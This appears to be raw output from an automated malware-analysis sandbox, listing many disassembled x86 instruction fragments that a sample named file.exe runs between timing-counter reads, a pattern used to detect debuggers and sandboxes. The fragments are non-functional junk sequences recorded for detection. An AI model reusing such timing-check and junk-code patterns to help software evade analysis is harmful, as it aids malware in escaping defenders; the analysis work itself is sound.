                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B4E7 second address: A6B509 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0B09070BC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0B09070BCEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F0B09070BC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B509 second address: A6B52F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007F0B08CB6D20h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F0B08CB6D16h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B52F second address: A6B538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C16E second address: A6C172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3EE second address: A6C3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3F4 second address: A6C418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0B08CB6D29h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75CC9 second address: A75CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75CCF second address: A75CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78115 second address: A7811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7811E second address: A78122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF3E3 second address: 9DF403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BCFh 0x00000008 jmp 00007F0B09070BCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AD02 second address: A7AD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81319 second address: A81328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jbe 00007F0B09070BC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81328 second address: A8132C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8132C second address: A81332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAAF second address: A2CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 sbb dl, FFFFFFD1h 0x0000000b push 00000004h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0B08CB6D18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D359Bh], edx 0x0000002d mov dword ptr [ebp+122D2855h], esi 0x00000033 nop 0x00000034 pushad 0x00000035 jc 00007F0B08CB6D1Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A815E1 second address: A815ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A815ED second address: A81608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81608 second address: A81621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81773 second address: A81779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85608 second address: A85614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0B09070BC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85614 second address: A8561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85DFE second address: A85E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85E04 second address: A85E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8917B second address: A89193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD3h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89193 second address: A891A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891A1 second address: A891AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891AB second address: A891B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A888BD second address: A888C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A888C1 second address: A888C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A888C5 second address: A888CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88B50 second address: A88B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88B54 second address: A88B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0B09070BC8h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88B67 second address: A88B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0B08CB6D16h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F0B08CB6D1Ch 0x00000014 pop ebx 0x00000015 jne 00007F0B08CB6D27h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88EB6 second address: A88EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E460 second address: A8E466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E466 second address: A8E46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E5E7 second address: A8E5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0B08CB6D16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EFBE second address: A8EFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F0B09070BCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EFCC second address: A8EFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EFD0 second address: A8EFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F266 second address: A8F27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0B08CB6D22h 0x0000000e jnc 00007F0B08CB6D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F27C second address: A8F280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95853 second address: A95865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95865 second address: A9586A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9586A second address: A9587A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B08CB6D16h 0x0000000a jbe 00007F0B08CB6D16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9877F second address: A98783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98A33 second address: A98A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B08CB6D1Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98A41 second address: A98A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98F9E second address: A98FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98FA2 second address: A98FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B09070BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0B09070BD3h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99172 second address: A99177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A992F3 second address: A992F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A992F8 second address: A992FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A992FF second address: A99308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99308 second address: A9930C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1C9E second address: AA1CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F0B09070BC8h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0B09070BC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1CB8 second address: AA1CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0B08CB6D26h 0x0000000b jo 00007F0B08CB6D16h 0x00000011 jng 00007F0B08CB6D16h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1CE7 second address: AA1CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1CED second address: AA1CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA00CD second address: AA00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA00D1 second address: AA00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0658 second address: AA065E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA065E second address: AA0669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B08CB6D16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0669 second address: AA0676 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B09070BC8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0676 second address: AA067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0BF3 second address: AA0BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0BF9 second address: AA0BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0BFF second address: AA0C17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnp 00007F0B09070BC6h 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0C17 second address: AA0C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B08CB6D24h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1440 second address: AA1444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1444 second address: AA1448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FA98 second address: A9FA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FA9D second address: A9FAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FAA3 second address: A9FAAD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B09070BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FAAD second address: A9FAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4E83 second address: AA4EA0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0B09070BD3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4EA0 second address: AA4EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0B08CB6D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4EAB second address: AA4EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0B09070BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0B09070BC6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9533 second address: AA9581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F0B08CB6D2Ch 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007F0B08CB6D24h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F0B08CB6D1Dh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9581 second address: AA9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9585 second address: AA9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0116 second address: AB011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB011A second address: AB0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0125 second address: AB012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB012B second address: AB0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABCD88 second address: ABCD8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABCD8D second address: ABCDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jo 00007F0B08CB6D24h 0x0000000f jmp 00007F0B08CB6D1Eh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jl 00007F0B08CB6D31h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABCDB6 second address: ABCDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC913 second address: ABC919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC919 second address: ABC942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0B09070BD4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC942 second address: ABC948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC948 second address: ABC96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0B09070BD7h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE56E second address: ACE57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B08CB6D16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2CE8 second address: AD2D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B09070BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F0B09070BCCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2D05 second address: AD2D12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2D12 second address: AD2D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2E79 second address: AD2E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2E7D second address: AD2E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD0h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2E99 second address: AD2EB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2EB4 second address: AD2EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F0B09070BD3h 0x0000000f jmp 00007F0B09070BD6h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B09070BCBh 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
